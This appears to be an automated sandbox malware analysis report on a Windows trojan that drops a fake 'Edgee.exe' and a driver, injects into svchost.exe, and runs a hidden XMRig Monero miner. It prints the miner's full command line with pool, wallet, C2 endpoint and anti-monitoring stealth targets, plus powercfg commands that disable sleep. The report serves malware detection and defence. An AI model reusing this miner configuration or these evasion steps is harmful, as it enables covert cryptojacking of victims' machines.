          Source: svchost.exe, 0000001B.00000002.2979872536.000001693E02F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SVCHOST.EXE--ALGO=RX/0--URL=POOL.SUPPORTXMR.COM:3333--USER=4335MEZGWWSMBW161UQP6WAQYXZTRVXWSBPKZPXTXXAH4MTOXXBIERHGBAB8XHDZAEMKWWVNP49WWK5RIBJ37AK2AZKAEKR--PASS=CW--CPU-MAX-THREADS-HINT=30--CINIT-WINRING=EGFVWBUZPBVZ.SYS--RANDOMX-NO-RDMSR--CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE--CINIT-STEALTH-FULLSCREEN--CINIT-API=HTTP://83.217.209.235/YZYZYZYZNZNNZNZXNCXZHZXCHZCXHCXZHZXCHZCXZXCJJKASDJKSAJKDSA/API/ENDPOINT.PHP--CINIT-VERSION=3.4.1--CINIT-IDLE-WAIT=10--CINIT-IDLE-CPU=70--CINIT-ID=WVRYIKMMHSKMHXZL
          Source: svchost.exe, 0000001B.00000002.2979872536.000001693E02F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXELTQ.EX
          Source: svchost.exe, 0000001B.00000002.2979872536.000001693E02F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5X/0 --URL=POOL.SUPPORTXMR.COM:3333 --USER="4335MEZGWWSMBW161UQP6WAQYXZTRVXWSBPKZPXTXXAH4MTOXXBIERHGBAB8XHDZAEMKWWVNP49WWK5RIBJ37AK2AZKAEKR" --PASS="CW" --CPU-MAX-THREADS-HINT=30 --CINIT-WINRING="EGFVWBUZPBVZ.SYS" --RANDOMX-NO-RDMSR --CINIT-STEALTH-TARGETS="TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE" --CINIT-STEALTH-FULLSCREEN --CINIT-API="HTTP://83.217.209.235/YZYZYZYZNZNNZNZXNCXZHZXCHZCXHCXZHZXCHZCXZXCJJKASDJKSAJKDSA/API/ENDPOINT.PHP" --CINIT-VERSION="3.4.1" --CINIT-IDLE-WAIT=10 --CINIT-IDLE-CPU=70 --CINIT-ID="WVRYIKMMHSKMHXZL"
          Source: svchost.exe, 0000001B.00000002.2979872536.000001693E02F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000003.1729543619.000001693E06B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001B.00000002.2979959714.000001693E083000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
          Source: svchost.exe, 0000001B.00000003.1729543619.000001693E06B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEHTTP://83.217.209.235/YZYZYZYZNZNNZNZXNCXZHZXCHZCXHCXZHZXCHZCXZXCJJKASDJKSAJKDSA/API/ENDPOINT.PHPWVRYIKMMHSKMHXZL
          Source: C:\ProgramData\MicrosoftEdge\Edgee.exeDropped PE file which has not been started: C:\Windows\Temp\egfvwbuzpbvz.sysJump to dropped file
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exeAPI coverage: 3.3 %
          Source: C:\ProgramData\MicrosoftEdge\Edgee.exeAPI coverage: 3.3 %
          Source: C:\Windows\System32\conhost.exeAPI coverage: 0.9 %
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
          Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: svchost.exe, 0000001B.00000002.2979872536.000001693E05E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: svchost.exe, 0000001B.00000002.2979931323.000001693E06A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {"id":"wvryikmmhskmhxzl","computername":"051829","username":"SYSTEM","gpu":"BZUOM","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.1","activewindow":"Running as System","runtime":120,"type":"xmrig","pool":"pool.supportxmr.com","port":3333,"algo":"rx/0","worker":"","password":"cw","user":"4335MezGWwSMbW161uqp6waQyxztRVXwSBpkzpXTXxah4mToXxBiErhgBAB8XhdzAeMKwWvnP49wWK5riBJ37AK2AZKAEKR","hashrate":389.8165326736755,"status":2}MSAFD RfComm [Bluetooth]Hyper-V RAWMSAFD L2CAP [Bluetooth]RSVP TCPv6 Service Provider
          Source: svchost.exe, 0000001B.00000002.2979820922.000001693E013000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
          Source: C:\Windows\System32\svchost.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exeCode function: 0_2_00007FF64FE01160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,0_2_00007FF64FE01160
          Source: C:\ProgramData\MicrosoftEdge\Edgee.exeCode function: 17_2_00007FF6D96D1160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,17_2_00007FF6D96D1160
          Source: C:\Windows\System32\conhost.exeCode function: 23_2_0000000140001160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,23_2_0000000140001160

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\ProgramData\MicrosoftEdge\Edgee.exeThread register set: target process: 4928Jump to behavior
          Source: C:\ProgramData\MicrosoftEdge\Edgee.exeThread register set: target process: 4040Jump to behavior
          Source: C:\ProgramData\MicrosoftEdge\Edgee.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exeJump to behavior
          Source: C:\ProgramData\MicrosoftEdge\Edgee.exeProcess created: C:\Windows\System32\svchost.exe svchost.exeJump to behavior

          Lowering of HIPS / PFW / Operating System Security Settings

          barindex
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          Source: C:\ProgramData\MicrosoftEdge\Edgee.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
          Source: C:\ProgramData\MicrosoftEdge\Edgee.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
          Source: C:\ProgramData\MicrosoftEdge\Edgee.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
          Source: svchost.exe, 0000001B.00000002.2979931323.000001693E06A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procexp.exe
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts21
          Windows Management Instrumentation
          11
          Windows Service
          11
          Windows Service
          1
          Masquerading
          OS Credential Dumping321
          Security Software Discovery
          Remote Services1
          Archive Collected Data
          1
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Service Execution
          1
          DLL Side-Loading
          111
          Process Injection
          11
          Virtualization/Sandbox Evasion
          LSASS Memory11
          Virtualization/Sandbox Evasion
          Remote Desktop ProtocolData from Removable Media1
          Non-Standard Port
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
          DLL Side-Loading
          111
          Process Injection
          Security Account Manager1
          Process Discovery
          SMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          Deobfuscate/Decode Files or Information
          NTDS12
          System Information Discovery
          Distributed Component Object ModelInput Capture2
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
          Obfuscated Files or Information
          LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          DLL Side-Loading
          Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1542926 Sample: SecuriteInfo.com.Trojan.Sig... Startdate: 26/10/2024 Architecture: WINDOWS Score: 100 54 pool.supportxmr.com 2->54 56 pool-fr.supportxmr.com 2->56 62 Malicious sample detected (through community Yara rule) 2->62 64 Multi AV Scanner detection for submitted file 2->64 66 Yara detected Xmrig cryptocurrency miner 2->66 68 6 other signatures 2->68 8 Edgee.exe 1 2->8         started        12 SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exe 2 2->12         started        signatures3 process4 file5 50 C:\Windows\Temp\egfvwbuzpbvz.sys, PE32+ 8->50 dropped 70 Multi AV Scanner detection for dropped file 8->70 72 Modifies the context of a thread in another process (thread injection) 8->72 74 Sample is not signed and drops a device driver 8->74 14 svchost.exe 8->14         started        18 powercfg.exe 1 8->18         started        20 powercfg.exe 1 8->20         started        28 3 other processes 8->28 52 C:\ProgramData\MicrosoftEdgedgee.exe, PE32+ 12->52 dropped 76 Uses powercfg.exe to modify the power settings 12->76 78 Modifies power options to not sleep / hibernate 12->78 22 powercfg.exe 1 12->22         started        24 powercfg.exe 1 12->24         started        26 powercfg.exe 1 12->26         started        30 5 other processes 12->30 signatures6 process7 dnsIp8 58 pool-fr.supportxmr.com 141.94.96.71, 3333, 49730 DFNVereinzurFoerderungeinesDeutschenForschungsnetzese Germany 14->58 60 83.217.209.235, 49731, 55538, 55771 INF-NET-ASRU Russian Federation 14->60 80 Query firmware table information (likely to detect VMs) 14->80 82 Found strings related to Crypto-Mining 14->82 84 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 14->84 32 conhost.exe 18->32         started        34 conhost.exe 20->34         started        36 conhost.exe 22->36         started        38 conhost.exe 24->38         started        40 conhost.exe 26->40         started        46 2 other processes 28->46 42 conhost.exe 30->42         started        44 conhost.exe 30->44         started        48 3 other processes 30->48 signatures9 86 Detected Stratum mining protocol 58->86 process10

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exe82%ReversingLabsWin64.Trojan.MintZard
          SourceDetectionScannerLabelLink
          C:\ProgramData\MicrosoftEdge\Edgee.exe79%ReversingLabsWin64.Trojan.MintZard
          C:\Windows\Temp\egfvwbuzpbvz.sys5%ReversingLabs
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          NameIPActiveMaliciousAntivirus DetectionReputation
          pool-fr.supportxmr.com
          141.94.96.71
          truetrue
            unknown
            pool.supportxmr.com
            unknown
            unknowntrue
              unknown
              NameMaliciousAntivirus DetectionReputation
              http://83.217.209.235/yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.phptrue
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://83.217.209.235/yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.phpwvrsvchost.exe, 0000001B.00000003.1729543619.000001693E06B000.00000004.00000020.00020000.00000000.sdmpfalse
                  unknown
                  http://83.217.209.235/yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.php--csvchost.exe, 0000001B.00000002.2979872536.000001693E02F000.00000004.00000020.00020000.00000000.sdmpfalse
                    unknown
                    http://83.217.209.235/yzyzyzyznznnznzxncxzhzxsvchost.exe, 0000001B.00000002.2979872536.000001693E02F000.00000004.00000020.00020000.00000000.sdmpfalse
                      unknown
                      http://83.217.209.235/yzyzyzyznznnznzxncxzhzxxhcxsvchost.exe, 0000001B.00000002.2979872536.000001693E02F000.00000004.00000020.00020000.00000000.sdmpfalse
                        unknown
                        http://83.217.209.235/yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.phpxsvchost.exe, 0000001B.00000002.2979959714.000001693E083000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          http://83.217.209.235/yzyzyzyznznnznzxncxzhzxchzcxhcxzhzxchzcxzxcjjkasdjksajkdsa/api/endpoint.phpIsvchost.exe, 0000001B.00000002.2979959714.000001693E083000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            https://xmrig.com/docs/algorithmssvchost.exe, 0000001B.00000002.2978520139.0000000140001000.00000040.00000001.00020000.00000000.sdmpfalse
                              unknown
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                              IPDomainCountryFlagASNASN NameMalicious
                              141.94.96.71
                              pool-fr.supportxmr.comGermany
                              680DFNVereinzurFoerderungeinesDeutschenForschungsnetzesetrue
                              83.217.209.235
                              unknownRussian Federation
                              31514INF-NET-ASRUtrue
                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1542926
                              Start date and time:2024-10-26 22:31:05 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 6m 34s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:32
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exe
                              Detection:MAL
                              Classification:mal100.spyw.evad.mine.winEXE@40/2@1/2
                              EGA Information:
                              • Successful, ratio: 75%
                              HCA Information:Failed
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                              • Excluded IPs from analysis (whitelisted): 4.175.87.197, 93.184.221.240, 13.85.23.206, 40.69.42.241
                              • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, 4.8.2.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.0.0.2.0.c.0.0.3.0.1.3.0.6.2.ip6.arpa, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                              • Execution Graph export aborted for target svchost.exe, PID 4040 because there are no executed function
                              • Not all processes where analyzed, report is missing behavior information
                              • VT rate limit hit for: SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exe
                              TimeTypeDescription
                              16:32:01API Interceptor1x Sleep call for process: SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exe modified
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              141.94.96.71xmr_linux_amd64 (2).elfGet hashmaliciousXmrigBrowse
                                SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exeGet hashmaliciousXmrigBrowse
                                  kWYLtJ0Cn1.exeGet hashmaliciousLoaderBot, XmrigBrowse
                                    h2UFp4aCRq.exeGet hashmaliciousLoaderBot, XmrigBrowse
                                      http://pool.supportxmr.comGet hashmaliciousUnknownBrowse
                                        http://pool.supportxmr.comGet hashmaliciousUnknownBrowse
                                          01904399.dat.exeGet hashmaliciousLoaderBot, XmrigBrowse
                                            file.exeGet hashmaliciousXmrigBrowse
                                              file.exeGet hashmaliciousXmrigBrowse
                                                KMSPicoSetup.exeGet hashmaliciousXmrigBrowse
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  pool-fr.supportxmr.comfile.exeGet hashmaliciousXmrigBrowse
                                                  • 141.94.96.71
                                                  egFMhHSlmf.exeGet hashmaliciousXmrigBrowse
                                                  • 141.94.96.71
                                                  xmr_linux_amd64 (2).elfGet hashmaliciousXmrigBrowse
                                                  • 141.94.96.195
                                                  xmr_linux_amd64.elfGet hashmaliciousXmrigBrowse
                                                  • 141.94.96.195
                                                  SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exeGet hashmaliciousXmrigBrowse
                                                  • 141.94.96.144
                                                  Q3pEXxmWAD.exeGet hashmaliciousXmrigBrowse
                                                  • 141.94.96.195
                                                  file.exeGet hashmaliciousAmadey, Babadeda, Stealc, Vidar, XmrigBrowse
                                                  • 141.94.96.71
                                                  kWYLtJ0Cn1.exeGet hashmaliciousLoaderBot, XmrigBrowse
                                                  • 141.94.96.195
                                                  updater.exeGet hashmaliciousXmrigBrowse
                                                  • 141.94.96.71
                                                  xjSglbp263.exeGet hashmaliciousXmrigBrowse
                                                  • 141.94.96.71
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  DFNVereinzurFoerderungeinesDeutschenForschungsnetzesekkkmips.elfGet hashmaliciousUnknownBrowse
                                                  • 141.61.34.241
                                                  kkkx86.elfGet hashmaliciousUnknownBrowse
                                                  • 149.203.174.71
                                                  la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                  • 132.253.158.40
                                                  la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                  • 132.253.15.114
                                                  la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                  • 131.188.35.225
                                                  la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                  • 134.28.11.229
                                                  la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                                  • 132.199.92.247
                                                  la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                  • 134.177.14.98
                                                  la.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                  • 141.51.160.39
                                                  botnet.m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 188.1.142.45
                                                  INF-NET-ASRUla.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                  • 89.169.156.81
                                                  aisuru.mips.elfGet hashmaliciousUnknownBrowse
                                                  • 5.35.44.21
                                                  la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                  • 5.35.122.218
                                                  aXyM30sV1V.elfGet hashmaliciousMiraiBrowse
                                                  • 89.169.156.73
                                                  SecuriteInfo.com.PUA.Tool.InstSrv.3.16098.13705.exeGet hashmaliciousUnknownBrowse
                                                  • 89.169.29.246
                                                  SecuriteInfo.com.PUA.Tool.InstSrv.3.16098.13705.exeGet hashmaliciousUnknownBrowse
                                                  • 89.169.29.246
                                                  2qWIvXORVU.elfGet hashmaliciousMirai, MoobotBrowse
                                                  • 89.169.193.60
                                                  https://www.diamondsbyeden.com/Get hashmaliciousUnknownBrowse
                                                  • 89.169.13.147
                                                  https://www.diamondsbyeden.com/Get hashmaliciousUnknownBrowse
                                                  • 89.169.13.147
                                                  http://www.freemangas.comGet hashmaliciousUnknownBrowse
                                                  • 89.169.13.147
                                                  No context
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  C:\Windows\Temp\egfvwbuzpbvz.sysprog.exeGet hashmaliciousXmrigBrowse
                                                    T52Z708x2p.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                      lJ4EzPSKMj.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                        Us051y7j25.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                          bypass.exeGet hashmaliciousXmrigBrowse
                                                            MDE_File_Sample_7046d0b264f80a016ec10158377c7e76c395cffb.zipGet hashmaliciousXmrigBrowse
                                                              Q3Vq6yp33F.exeGet hashmaliciousXmrigBrowse
                                                                2JkHiPgkLE.exeGet hashmaliciousXmrigBrowse
                                                                  file.exeGet hashmaliciousXmrigBrowse
                                                                    loader.exeGet hashmaliciousXmrigBrowse
                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exe
                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):2625024
                                                                      Entropy (8bit):6.524166835942732
                                                                      Encrypted:false
                                                                      SSDEEP:49152:8F6Y8mlBll44tW535rFyGAlvZVzfKQJYvDCZ3OL0WiqIZJdGUH1SOfSLA+DpHscK:TUBLTErFyGA1DJY7CZeL0WFwGUVSOf+b
                                                                      MD5:226EB2BBB97ABBCABBD5BF08418CBE9C
                                                                      SHA1:53C7485DB2E1ACB4B70A0A277D58E9FFEC8A050D
                                                                      SHA-256:97E37EAF752B14313EE9AAA158F7028C092ADEB4A902CB9618F58CFFE29EEED2
                                                                      SHA-512:CCDB91715DC244364AC80BF7DFF4B971B4CE5473EBED7F59A3AC68C4B5B7C0919CADF352A64B008D2AF8CE5081440119A4DB55D7B208DE94411761CB42CE055B
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 79%
                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......g.........."......p....'.....@..........@.............................p(...........`.....................................................<............0(..............`(.x...............................(.......8...........0...X............................text...fn.......p.................. ..`.rdata...............t..............@..@.data.....'......v'.................@....pdata.......0(.......(.............@..@.00cfg.......@(.......(.............@..@.tls.........P(.......(.............@....reloc..x....`(.......(.............@..B................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\ProgramData\MicrosoftEdge\Edgee.exe
                                                                      File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):14544
                                                                      Entropy (8bit):6.2660301556221185
                                                                      Encrypted:false
                                                                      SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                      MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                      SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                      SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                      SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 5%
                                                                      Joe Sandbox View:
                                                                      • Filename: prog.exe, Detection: malicious, Browse
                                                                      • Filename: T52Z708x2p.exe, Detection: malicious, Browse
                                                                      • Filename: lJ4EzPSKMj.exe, Detection: malicious, Browse
                                                                      • Filename: Us051y7j25.exe, Detection: malicious, Browse
                                                                      • Filename: bypass.exe, Detection: malicious, Browse
                                                                      • Filename: MDE_File_Sample_7046d0b264f80a016ec10158377c7e76c395cffb.zip, Detection: malicious, Browse
                                                                      • Filename: Q3Vq6yp33F.exe, Detection: malicious, Browse
                                                                      • Filename: 2JkHiPgkLE.exe, Detection: malicious, Browse
                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                      • Filename: loader.exe, Detection: malicious, Browse
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                                                      File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                      Entropy (8bit):6.524166835942732
                                                                      TrID:
                                                                      • Win64 Executable GUI (202006/5) 92.65%
                                                                      • Win64 Executable (generic) (12005/4) 5.51%
                                                                      • Generic Win/DOS Executable (2004/3) 0.92%
                                                                      • DOS Executable Generic (2002/1) 0.92%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exe
                                                                      File size:2'625'024 bytes
                                                                      MD5:226eb2bbb97abbcabbd5bf08418cbe9c
                                                                      SHA1:53c7485db2e1acb4b70a0a277d58e9ffec8a050d
                                                                      SHA256:97e37eaf752b14313ee9aaa158f7028c092adeb4a902cb9618f58cffe29eeed2
                                                                      SHA512:ccdb91715dc244364ac80bf7dff4b971b4ce5473ebed7f59a3ac68c4b5b7c0919cadf352a64b008d2af8ce5081440119a4db55d7b208de94411761cb42ce055b
                                                                      SSDEEP:49152:8F6Y8mlBll44tW535rFyGAlvZVzfKQJYvDCZ3OL0WiqIZJdGUH1SOfSLA+DpHscK:TUBLTErFyGA1DJY7CZeL0WFwGUVSOf+b
                                                                      TLSH:A1C533D33106AD3CD2E68575840F5BB8589EF43DCB2AE4D386E181B262985F9F6319F0
                                                                      File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......g.........."......p....'.....@..........@.............................p(...........`........................................
                                                                      Icon Hash:90cececece8e8eb0
                                                                      Entrypoint:0x140001140
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x140000000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x670302E6 [Sun Oct 6 21:36:38 2024 UTC]
                                                                      TLS Callbacks:0x40001760, 0x1, 0x400017e0, 0x1
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:6
                                                                      OS Version Minor:0
                                                                      File Version Major:6
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:6
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:de41d4e0545d977de6ca665131bb479a
                                                                      Instruction
                                                                      dec eax
                                                                      sub esp, 28h
                                                                      dec eax
                                                                      mov eax, dword ptr [00006ED5h]
                                                                      mov dword ptr [eax], 00000001h
                                                                      call 00007F98A0E57CAFh
                                                                      nop
                                                                      nop
                                                                      nop
                                                                      dec eax
                                                                      add esp, 28h
                                                                      ret
                                                                      nop
                                                                      inc ecx
                                                                      push edi
                                                                      inc ecx
                                                                      push esi
                                                                      push esi
                                                                      push edi
                                                                      push ebx
                                                                      dec eax
                                                                      sub esp, 20h
                                                                      dec eax
                                                                      mov eax, dword ptr [00000030h]
                                                                      dec eax
                                                                      mov edi, dword ptr [eax+08h]
                                                                      dec eax
                                                                      mov esi, dword ptr [00006EC9h]
                                                                      xor eax, eax
                                                                      dec eax
                                                                      cmpxchg dword ptr [esi], edi
                                                                      sete bl
                                                                      je 00007F98A0E57CD0h
                                                                      dec eax
                                                                      cmp edi, eax
                                                                      je 00007F98A0E57CCBh
                                                                      dec esp
                                                                      mov esi, dword ptr [000085C9h]
